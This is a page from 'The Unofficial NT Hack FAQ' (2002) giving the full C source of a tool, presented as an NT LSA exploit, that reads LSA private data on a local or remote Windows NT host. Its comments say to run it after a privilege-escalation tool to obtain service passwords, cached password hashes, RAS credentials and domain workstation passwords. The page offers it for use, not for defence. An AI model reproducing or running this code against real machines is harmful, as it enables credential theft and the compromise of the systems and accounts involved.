The Unofficial NT Hack FAQ - Appendix 3


Published: Oct 16, 2002 Updated: Oct 16, 2002 Section: Network Security Library :: Windows Security :: The Unofficial NT Hack FAQ Author: Printable Version Adjust font size: Rating: 4.3/5 - 3 Votes 1 2 3 4 5

A-03. Source Code for NT LSA Exploit



Author is Paul Ashton <paul@argo.demon.co.uk>
/*
 * Must be run as administrator. Might be a good thing to play with after
 * running getadmin ;-0 -- also note this works on raw 4.0 with no SPs.
 *
 * Run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data
 * or any other registry key under NTLM\security\policy\secrets.
 * You should be able to get service passwords, cached password hashes
 * of the last users to login, RAS accounts and passwords, workstation
 * passwords for domain access, etc.
 */

#include <windows.h>
#include <stdio.h>

#include "ntsecapi.h"
#define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else
void write();

PLSA_UNICODE_STRING
str(LPWSTR x)
{
    static LSA_UNICODE_STRING s;

    s.Buffer=x;
    s.Length=wcslen(x)*sizeof(WCHAR);
    s.MaximumLength = (wcslen(x)+1)*2;
    return &s;
}

int _cdecl
main(int argc, char *argv[])
{
    LSA_HANDLE pol;
    PLSA_UNICODE_STRING foo;
    LSA_OBJECT_ATTRIBUTES attrs;
    WCHAR keyname[256]=L"";
    WCHAR host[256]=L"";

    wsprintfW(keyname, L"%hS", argv[1]);
    if(argc == 3) wsprintfW(host, L"%hS", argv[2]);
    memset(&attrs, 0, sizeof(attrs));
    AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));
    AST(!LsaRetrievePrivateData(pol, str(keyname), &foo));
    write(1, foo->Buffer, foo->Length);
    LsaClose(pol);
    exit(0);
}